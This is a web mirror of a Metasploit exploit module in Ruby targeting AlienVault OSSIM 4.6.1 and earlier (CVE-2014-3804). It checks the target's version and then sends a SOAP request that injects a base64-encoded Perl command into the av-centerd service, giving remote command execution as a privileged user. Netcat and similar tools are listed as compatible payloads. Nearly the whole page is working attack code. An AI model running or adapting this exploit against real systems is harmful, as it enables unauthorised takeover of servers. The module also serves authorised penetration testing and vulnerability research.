CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45require 'rexml/document'67class MetasploitModule < Msf::Exploit::Remote8Rank = ExcellentRanking910include Msf::Exploit::Remote::HttpClient11include REXML1213def initialize(info = {})14super(update_info(info,15'Name' => 'AlienVault OSSIM av-centerd Command Injection',16'Description' => %q{17This module exploits a code execution flaw in AlienVault 4.6.1 and18prior. The vulnerability exists in the av-centerd SOAP web service,19where the update_system_info_debian_package method uses perl backticks20in an insecure way, allowing command injection. This module has been21tested successfully on AlienVault 4.6.0.22},23'Author' =>24[25'Unknown', # From HP ZDI team, Vulnerability discovery26'juan vazquez' # Metasploit module27],28'License' => MSF_LICENSE,29'References' =>30[31['CVE', '2014-3804'],32['BID', '67999'],33['ZDI', '14-202'],34['URL', 'http://forums.alienvault.com/discussion/2690']35],36'Privileged' => true,37'Platform' => 'unix',38'Arch' => ARCH_CMD,39'Payload' =>40{41#'BadChars' => "[;`$<>|]", # Don't apply bcuz of the perl stub applied42'Compat' => {43'RequiredCmd' => 'perl netcat-e openssl python gawk'44}45},46'DefaultOptions' =>47{48'SSL' => true49},50'Targets' =>51[52[ 'AlienVault <= 4.6.1', { }]53],54'DefaultTarget' => 0,55'DisclosureDate' => '2014-05-05'))5657register_options(58[59Opt::RPORT(40007)60])61end6263def check64version = ""65res = send_soap_request("get_dpkg")6667if res &&68res.code == 200 &&69res.headers['SOAPServer'] &&70res.headers['SOAPServer'] =~ /SOAP::Lite/ &&71res.body.to_s =~ /alienvault-center\s*([\d\.]*)-\d/7273version = $174end7576if version.empty? || version >= "4.7.0"77return Exploit::CheckCode::Safe78else79return Exploit::CheckCode::Appears80end81end8283def exploit84send_soap_request("update_system_info_debian_package", 1)85end8687def build_soap_request(method)88xml = Document.new89xml.add_element(90"soap:Envelope",91{92'xmlns:xsi' => "http://www.w3.org/2001/XMLSchema-instance",93'xmlns:soapenc' => "http://schemas.xmlsoap.org/soap/encoding/",94'xmlns:xsd' => "http://www.w3.org/2001/XMLSchema",95'soap:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/",96'xmlns:soap' => "http://schemas.xmlsoap.org/soap/envelope/"97})98body = xml.root.add_element("soap:Body")99m = body.add_element(100method,101{102'xmlns' => "AV/CC/Util"103})104args = []105args[0] = m.add_element("c-gensym3", {'xsi:type' => 'xsd:string'})106args[1] = m.add_element("c-gensym5", {'xsi:type' => 'xsd:string'})107args[2] = m.add_element("c-gensym7", {'xsi:type' => 'xsd:string'})108args[3] = m.add_element("c-gensym9", {'xsi:type' => 'xsd:string'})109(0..3).each { |i| args[i].text = rand_text_alpha(4 + rand(4)) }110111if method == "update_system_info_debian_package"112args[4] = m.add_element("c-gensym11", {'xsi:type' => 'xsd:string'})113perl_payload = "system(decode_base64"114perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"115args[4].text = "#{rand_text_alpha(4 + rand(4))}"116args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"117end118119xml.to_s120end121122def send_soap_request(method, timeout = 20)123soap = build_soap_request(method)124125res = send_request_cgi({126'uri' => '/av-centerd',127'method' => 'POST',128'ctype' => 'text/xml; charset=UTF-8',129'data' => soap,130'headers' => {131'SOAPAction' => "\"AV/CC/Util##{method}\""132}133}, timeout)134135res136end137end138139140